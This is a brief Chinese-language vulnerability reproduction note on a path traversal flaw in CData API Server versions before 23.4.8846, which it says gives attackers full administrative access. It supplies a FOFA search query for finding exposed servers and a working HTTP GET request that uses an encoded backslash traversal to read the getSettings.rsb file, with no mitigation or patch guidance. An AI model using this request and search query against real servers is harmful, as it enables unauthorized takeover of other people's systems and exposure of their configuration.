0x01 产品简介
CData API Server是CData公司的一个强大的数据连接平台,旨在帮助企业轻松地访问、整合和分析各种数据源。
0x02 漏洞概述
CData API Server 23.4.8846之前版本存在安全漏洞,该漏洞源于存在路径遍历漏洞。攻击者可利用该漏洞获得对应用程序的完全管理访问权限。
0x03 测绘语句
fofa: title="CData"
0x04 漏洞复现
GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1
Host:
Referer:http(https)://xxxx